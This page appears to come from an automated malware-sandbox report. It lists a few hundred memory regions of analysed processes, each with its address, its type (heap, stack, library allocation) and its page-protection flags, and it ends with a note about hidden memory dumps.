|
page read and write
|
||
|
D9840F7000
|
stack
|
page read and write
|
||
|
1BF9A4E9000
|
heap
|
page read and write
|
||
|
1FA01060000
|
heap
|
page read and write
|
||
|
1BF9A400000
|
heap
|
page read and write
|
||
|
2299D96C000
|
heap
|
page read and write
|
||
|
1BF94E40000
|
heap
|
page read and write
|
||
|
2D6115B7000
|
heap
|
page read and write
|
||
|
1E641A10000
|
heap
|
page read and write
|
||
|
4D9D6FE000
|
unkown
|
page readonly
|
||
|
B08A27E000
|
stack
|
page read and write
|
||
|
2D623841000
|
trusted library allocation
|
page read and write
|
||
|
CE9FAF8000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
6391FE000
|
stack
|
page read and write
|
||
|
1BF94E13000
|
heap
|
page read and write
|
||
|
C0DA54E000
|
stack
|
page read and write
|
||
|
1BF9A672000
|
trusted library allocation
|
page read and write
|
||
|
1E65B8C5000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
1BF94DE0000
|
heap
|
page read and write
|
||
|
1E65BAB3000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
2298394A000
|
heap
|
page read and write
|
||
|
1BF94DC0000
|
heap
|
page read and write
|
||
|
2D611866000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD190000
|
heap
|
page read and write
|
||
|
632EEFD000
|
stack
|
page read and write
|
||
|
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
|
2D62B5BB000
|
heap
|
page read and write
|
||
|
22985935000
|
trusted library allocation
|
page read and write
|
||
|
27257DB0000
|
heap
|
page read and write
|
||
|
23E82305000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
1BF95DB0000
|
trusted library section
|
page readonly
|
||
|
1BF9A740000
|
remote allocation
|
page read and write
|
||
|
2299DC23000
|
heap
|
page read and write
|
||
|
2D613356000
|
heap
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
1BF94F02000
|
heap
|
page read and write
|
||
|
1A52BC13000
|
heap
|
page read and write
|
||
|
4D9EEFE000
|
unkown
|
page readonly
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D9EDFB000
|
stack
|
page read and write
|
||
|
2D6134E0000
|
heap
|
page execute and read and write
|
||
|
2299DC1E000
|
heap
|
page read and write
|
||
|
1E42B64A000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
E87953B000
|
stack
|
page read and write
|
||
|
1BF9B000000
|
heap
|
page read and write
|
||
|
1E641837000
|
heap
|
page read and write
|
||
|
1BF9A390000
|
trusted library allocation
|
page read and write
|
||
|
22987224000
|
trusted library allocation
|
page read and write
|
||
|
1E6436AD000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
1BF94E73000
|
heap
|
page read and write
|
||
|
1B7B3C58000
|
heap
|
page read and write
|
||
|
1A52BC2B000
|
heap
|
page read and write
|
||
|
4D9E3FE000
|
unkown
|
page readonly
|
||
|
2299DC6B000
|
heap
|
page read and write
|
||
|
18075B40000
|
heap
|
page read and write
|
||
|
2D611730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
22983985000
|
heap
|
page read and write
|
||
|
2219A4F4000
|
heap
|
page read and write
|
||
|
1E64386A000
|
trusted library allocation
|
page read and write
|
||
|
23E82110000
|
heap
|
page read and write
|
||
|
2299DA80000
|
heap
|
page read and write
|
||
|
1BF9A3A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
27257EB0000
|
heap
|
page read and write
|
||
|
4BEA9EC000
|
stack
|
page read and write
|
||
|
1E42B580000
|
heap
|
page read and write
|
||
|
23E82260000
|
heap
|
page read and write
|
||
|
2D611513000
|
heap
|
page read and write
|
||
|
1BF9A4C6000
|
heap
|
page read and write
|
||
|
1BF9571B000
|
heap
|
page read and write
|
||
|
1E65BAD2000
|
heap
|
page read and write
|
||
|
1BF94DF0000
|
heap
|
page read and write
|
||
|
E878B53000
|
stack
|
page read and write
|
||
|
1E6419A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1BF94E2B000
|
heap
|
page read and write
|
||
|
2D6117A3000
|
trusted library allocation
|
page read and write
|
||
|
B6FFA7C000
|
stack
|
page read and write
|
||
|
1E641700000
|
heap
|
page read and write
|
||
|
4D9D8FE000
|
unkown
|
page readonly
|
||
|
1BF94E00000
|
heap
|
page read and write
|
||
|
2D6117F0000
|
heap
|
page execute and read and write
|
||
|
7FFD9BB32000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
2D6235C7000
|
trusted library allocation
|
page read and write
|
||
|
B08A8FC000
|
stack
|
page read and write
|
||
|
1BF94EB6000
|
heap
|
page read and write
|
||
|
1BF9A6E8000
|
trusted library allocation
|
page read and write
|
||
|
22983989000
|
heap
|
page read and write
|
||
|
2D613540000
|
heap
|
page read and write
|
||
|
1BF9A4BF000
|
heap
|
page read and write
|
||
|
B08A577000
|
stack
|
page read and write
|
||
|
1B7B3C02000
|
heap
|
page read and write
|
||
|
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
|
207AD05F000
|
heap
|
page read and write
|
||
|
2D623551000
|
trusted library allocation
|
page read and write
|
||
|
1BF94E98000
|
heap
|
page read and write
|
||
|
1E42B600000
|
heap
|
page read and write
|
||
|
7FFD9BC4D000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6FF000
|
trusted library allocation
|
page read and write
|
||
|
22985573000
|
heap
|
page read and write
|
||
|
1FA03002000
|
heap
|
page read and write
|
||
|
2298540D000
|
heap
|
page read and write
|
||
|
1BF9A3B4000
|
trusted library allocation
|
page read and write
|
||
|
22983B50000
|
trusted library allocation
|
page read and write
|
||
|
1E65BACB000
|
heap
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
2D6135D9000
|
trusted library allocation
|
page read and write
|
||
|
D9842FE000
|
stack
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
2D611530000
|
heap
|
page read and write
|
||
|
C0D977E000
|
stack
|
page read and write
|
||
|
CE9FCFE000
|
stack
|
page read and write
|
||
|
C0D96FD000
|
stack
|
page read and write
|
||
|
1E641A16000
|
heap
|
page read and write
|
||
|
6395FC000
|
stack
|
page read and write
|
||
|
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1BF95901000
|
trusted library allocation
|
page read and write
|
||
|
CE9FEFE000
|
stack
|
page read and write
|
||
|
1E6437D0000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
23E8222B000
|
heap
|
page read and write
|
||
|
1FA01002000
|
heap
|
page read and write
|
||
|
B08A1FF000
|
stack
|
page read and write
|
||
|
2D62B57A000
|
heap
|
page read and write
|
||
|
23E84202000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
229958D0000
|
trusted library allocation
|
page read and write
|
||
|
4D9E0FE000
|
unkown
|
page readonly
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD180000
|
heap
|
page read and write
|
||
|
1BF9A691000
|
trusted library allocation
|
page read and write
|
||
|
4D9D7FA000
|
stack
|
page read and write
|
||
|
1BF9A510000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1FA01102000
|
heap
|
page read and write
|
||
|
1E6435A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
57387FF000
|
stack
|
page read and write
|
||
|
1BF9571A000
|
heap
|
page read and write
|
||
|
1BF95DD0000
|
trusted library section
|
page readonly
|
||
|
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
207AEF40000
|
heap
|
page read and write
|
||
|
23E821D0000
|
heap
|
page read and write
|
||
|
2D62BB10000
|
heap
|
page read and write
|
||
|
1E6537E1000
|
trusted library allocation
|
page read and write
|
||
|
632EFFE000
|
stack
|
page read and write
|
||
|
1E35FFE000
|
stack
|
page read and write
|
||
|
B08A0FE000
|
stack
|
page read and write
|
||
|
4D9DBFE000
|
stack
|
page read and write
|
||
|
B08B2CE000
|
stack
|
page read and write
|
||
|
1BF9A600000
|
trusted library allocation
|
page read and write
|
||
|
2D62B550000
|
heap
|
page read and write
|
||
|
2D611510000
|
heap
|
page read and write
|
||
|
1E42B62B000
|
heap
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6C2000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A310000
|
trusted library allocation
|
page read and write
|
||
|
22983BC3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
|
27257CC0000
|
heap
|
page read and write
|
||
|
2D62B61A000
|
heap
|
page read and write
|
||
|
1E6417B0000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0D9182000
|
stack
|
page read and write
|
||
|
6394FE000
|
stack
|
page read and write
|
||
|
632EDFF000
|
stack
|
page read and write
|
||
|
27257DB9000
|
heap
|
page read and write
|
||
|
1BF9A442000
|
heap
|
page read and write
|
||
|
1E641730000
|
heap
|
page read and write
|
||
|
4D9ECFE000
|
unkown
|
page readonly
|
||
|
1B7B5A02000
|
heap
|
page read and write
|
||
|
E879F8E000
|
stack
|
page read and write
|
||
|
1A52BC02000
|
heap
|
page read and write
|
||
|
1FA01000000
|
heap
|
page read and write
|
||
|
C0D91CE000
|
stack
|
page read and write
|
||
|
2299DC2A000
|
heap
|
page read and write
|
||
|
1BF9A6F0000
|
trusted library allocation
|
page read and write
|
||
|
638D37000
|
stack
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
1A52BC00000
|
heap
|
page read and write
|
||
|
2D611864000
|
heap
|
page read and write
|
||
|
229838D0000
|
heap
|
page read and write
|
||
|
1E641770000
|
heap
|
page read and write
|
||
|
1BF95DF0000
|
trusted library section
|
page readonly
|
||
|
4D9E6FE000
|
unkown
|
page readonly
|
||
|
1E360FC000
|
stack
|
page read and write
|
||
|
1A52BD02000
|
heap
|
page read and write
|
||
|
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
|
1BF95C40000
|
trusted library allocation
|
page read and write
|
||
|
1E644DDD000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A71A000
|
trusted library allocation
|
page read and write
|
||
|
22986EAD000
|
trusted library allocation
|
page read and write
|
||
|
4D9EAFE000
|
unkown
|
page readonly
|
||
|
D0BF3DF000
|
stack
|
page read and write
|
||
|
22198B70000
|
heap
|
page read and write
|
||
|
22983C00000
|
heap
|
page execute and read and write
|
||
|
2D614EB8000
|
trusted library allocation
|
page read and write
|
||
|
1E643670000
|
heap
|
page execute and read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2D62B560000
|
heap
|
page read and write
|
||
|
1FA0102B000
|
heap
|
page read and write
|
||
|
2299DBF0000
|
heap
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A502000
|
heap
|
page read and write
|
||
|
1E42B590000
|
heap
|
page read and write
|
||
|
4D9DAFE000
|
unkown
|
page readonly
|
||
|
B08A678000
|
stack
|
page read and write
|
||
|
C0D99FE000
|
stack
|
page read and write
|
||
|
2D6150C9000
|
trusted library allocation
|
page read and write
|
||
|
1BF95DA0000
|
trusted library section
|
page readonly
|
||
|
C0D95FD000
|
stack
|
page read and write
|
||
|
1FA01058000
|
heap
|
page read and write
|
||
|
1E65B893000
|
heap
|
page read and write
|
||
|
1BF95615000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1BF94E8D000
|
heap
|
page read and write
|
||
|
4D9E7FE000
|
unkown
|
page readonly
|
||
|
B08A2FC000
|
stack
|
page read and write
|
||
|
1E64514A000
|
trusted library allocation
|
page read and write
|
||
|
2298743A000
|
trusted library allocation
|
page read and write
|
||
|
207AD002000
|
heap
|
page read and write
|
||
|
4D9DCFE000
|
unkown
|
page readonly
|
||
|
1BF95702000
|
heap
|
page read and write
|
||
|
C0DA64D000
|
stack
|
page read and write
|
||
|
2D611860000
|
heap
|
page read and write
|
||
|
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
|
2298557A000
|
heap
|
page read and write
|
||
|
23E82200000
|
heap
|
page read and write
|
||
|
1E641710000
|
heap
|
page read and write
|
||
|
1BF94E5B000
|
heap
|
page read and write
|
||
|
2D61156D000
|
heap
|
page read and write
|
||
|
1BF9A6F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
C0D957E000
|
stack
|
page read and write
|
||
|
E87A00D000
|
stack
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
18077400000
|
heap
|
page read and write
|
||
|
22983909000
|
heap
|
page read and write
|
||
|
7DF490A10000
|
trusted library allocation
|
page execute and read and write
|
||
|
22983AD0000
|
heap
|
page read and write
|
||
|
18077405000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1E644F77000
|
trusted library allocation
|
page read and write
|
||
|
E878E7E000
|
stack
|
page read and write
|
||
|
1BF9A3A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
22987503000
|
trusted library allocation
|
page read and write
|
||
|
1E65B970000
|
heap
|
page execute and read and write
|
||
|
23E82140000
|
heap
|
page read and write
|
||
|
2299DAA0000
|
heap
|
page read and write
|
||
|
9C0CAFC000
|
stack
|
page read and write
|
||
|
1B7B3C13000
|
heap
|
page read and write
|
||
|
C0DA5CE000
|
stack
|
page read and write
|
||
|
1EFBD23E000
|
heap
|
page read and write
|
||
|
1BF94F13000
|
heap
|
page read and write
|
||
|
1BF95DE0000
|
trusted library section
|
page readonly
|
||
|
1E42B560000
|
heap
|
page read and write
|
||
|
2299DC00000
|
heap
|
page read and write
|
||
|
5738AFE000
|
stack
|
page read and write
|
||
|
1BF9A517000
|
heap
|
page read and write
|
||
|
1A52BAB0000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
4D9E8FE000
|
stack
|
page read and write
|
||
|
1E644DD9000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD302000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2299D96F000
|
heap
|
page read and write
|
||
|
22983C50000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3A60000
|
heap
|
page read and write
|
||
|
2D61518F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A3E4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A6E5000
|
trusted library allocation
|
page read and write
|
||
|
207AEA80000
|
heap
|
page read and write
|
||
|
4D9D07B000
|
stack
|
page read and write
|
||
|
C0D97F9000
|
stack
|
page read and write
|
||
|
D9845FE000
|
stack
|
page read and write
|
||
|
D9841FE000
|
stack
|
page read and write
|
||
|
1E42B646000
|
heap
|
page read and write
|
||
|
1BF95600000
|
heap
|
page read and write
|
||
|
4D9D9FC000
|
stack
|
page read and write
|
||
|
1BF955E1000
|
trusted library allocation
|
page read and write
|
||
|
1E64180F000
|
heap
|
page read and write
|
||
|
1BF9A6E0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A4F8000
|
heap
|
page read and write
|
||
|
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
|
2D611760000
|
heap
|
page readonly
|
||
|
1BF9A66F000
|
trusted library allocation
|
page read and write
|
||
|
22995A7C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D62B6E0000
|
heap
|
page read and write
|
||
|
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A42C000
|
heap
|
page read and write
|
||
|
1BF9A3E0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A3B2000
|
trusted library allocation
|
page read and write
|
||
|
1E65BDF0000
|
heap
|
page read and write
|
||
|
22983C30000
|
heap
|
page execute and read and write
|
||
|
2D611578000
|
heap
|
page read and write
|
||
|
1FA01105000
|
heap
|
page read and write
|
||
|
2D62B5BD000
|
heap
|
page read and write
|
||
|
22987226000
|
trusted library allocation
|
page read and write
|
||
|
7DF482410000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
|
1FA01013000
|
heap
|
page read and write
|
||
|
B08A6FF000
|
stack
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
1E35BFE000
|
stack
|
page read and write
|
||
|
E878F7D000
|
stack
|
page read and write
|
||
|
1E42B602000
|
heap
|
page read and write
|
||
|
1E6435A0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A3D0000
|
trusted library allocation
|
page read and write
|
||
|
2D611750000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
22983B70000
|
trusted library allocation
|
page read and write
|
||
|
4D9E07E000
|
stack
|
page read and write
|
||
|
C0D967F000
|
stack
|
page read and write
|
||
|
B08A47D000
|
stack
|
page read and write
|
||
|
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF95700000
|
heap
|
page read and write
|
||
|
2D611539000
|
heap
|
page read and write
|
||
|
632ECFE000
|
stack
|
page read and write
|
||
|
272596F0000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
22985570000
|
heap
|
page read and write
|
||
|
6390FE000
|
stack
|
page read and write
|
||
|
1E643A12000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A3B0000
|
trusted library allocation
|
page read and write
|
||
|
B08A37E000
|
stack
|
page read and write
|
||
|
4D9EBFB000
|
stack
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
B08A3FE000
|
stack
|
page read and write
|
||
|
1B7B3C2B000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1BF94EA3000
|
heap
|
page read and write
|
||
|
2D6115B5000
|
heap
|
page read and write
|
||
|
1EFBD160000
|
heap
|
page read and write
|
||
|
1BF9A615000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A510000
|
heap
|
page read and write
|
||
|
1B7B3C49000
|
heap
|
page read and write
|
||
|
1E6417F5000
|
heap
|
page read and write
|
||
|
1E641980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
9C0C7FD000
|
stack
|
page read and write
|
||
|
E879236000
|
stack
|
page read and write
|
||
|
B6FFB7F000
|
stack
|
page read and write
|
||
|
1BF9A64D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
E879179000
|
stack
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
272596F4000
|
heap
|
page read and write
|
||
|
4BEAC7E000
|
stack
|
page read and write
|
||
|
1EFBD22B000
|
heap
|
page read and write
|
||
|
229838E0000
|
heap
|
page read and write
|
||
|
B08B34F000
|
stack
|
page read and write
|
||
|
E8791BE000
|
stack
|
page read and write
|
||
|
1BF9A608000
|
trusted library allocation
|
page read and write
|
||
|
23E82130000
|
heap
|
page read and write
|
||
|
22986EB2000
|
trusted library allocation
|
page read and write
|
||
|
2D614B4A000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD259000
|
heap
|
page read and write
|
||
|
18075B20000
|
heap
|
page read and write
|
||
|
2D611700000
|
heap
|
page read and write
|
||
|
22983B10000
|
heap
|
page read and write
|
||
|
1BF9A68E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
B08A17E000
|
stack
|
page read and write
|
||
|
B08A5FB000
|
stack
|
page read and write
|
||
|
23E82202000
|
heap
|
page read and write
|
||
|
207AD013000
|
heap
|
page read and write
|
||
|
207AD102000
|
heap
|
page read and write
|
||
|
4D9E37E000
|
stack
|
page read and write
|
||
|
1BF9A4B0000
|
heap
|
page read and write
|
||
|
4D9DF7E000
|
stack
|
page read and write
|
||
|
2D613551000
|
trusted library allocation
|
page read and write
|
||
|
C0D98F9000
|
stack
|
page read and write
|
||
|
1A52BC59000
|
heap
|
page read and write
|
||
|
E8794BE000
|
stack
|
page read and write
|
||
|
1A52BC3E000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
4BEACFF000
|
stack
|
page read and write
|
||
|
E878EFE000
|
stack
|
page read and write
|
||
|
1BF95DC0000
|
trusted library section
|
page readonly
|
||
|
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
|
18075A40000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
4D9DFFE000
|
unkown
|
page readonly
|
||
|
1E65BA8E000
|
heap
|
page read and write
|
||
|
7FFD9B9EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E42B613000
|
heap
|
page read and write
|
||
|
1EFBF202000
|
heap
|
page read and write
|
||
|
2D6117A0000
|
trusted library allocation
|
page read and write
|
||
|
1E65B7E0000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
4D9E17E000
|
stack
|
page read and write
|
||
|
23E82257000
|
heap
|
page read and write
|
||
|
1E641A14000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
2298394C000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
4D9E4F9000
|
stack
|
page read and write
|
||
|
27259680000
|
heap
|
page read and write
|
||
|
23E8224A000
|
heap
|
page read and write
|
||
|
E879339000
|
stack
|
page read and write
|
||
|
1A52BBB0000
|
heap
|
page read and write
|
||
|
22198B78000
|
heap
|
page read and write
|
||
|
229958C1000
|
trusted library allocation
|
page read and write
|
||
|
9C0C8FF000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E42B660000
|
heap
|
page read and write
|
||
|
1BF9A461000
|
heap
|
page read and write
|
||
|
1BF9A420000
|
heap
|
page read and write
|
||
|
C0D9978000
|
stack
|
page read and write
|
||
|
1EFBD305000
|
heap
|
page read and write
|
||
|
2D6134C0000
|
heap
|
page execute and read and write
|
||
|
B089DEF000
|
stack
|
page read and write
|
||
|
1E6437E1000
|
trusted library allocation
|
page read and write
|
There are 700 hidden memdumps, click here to show them.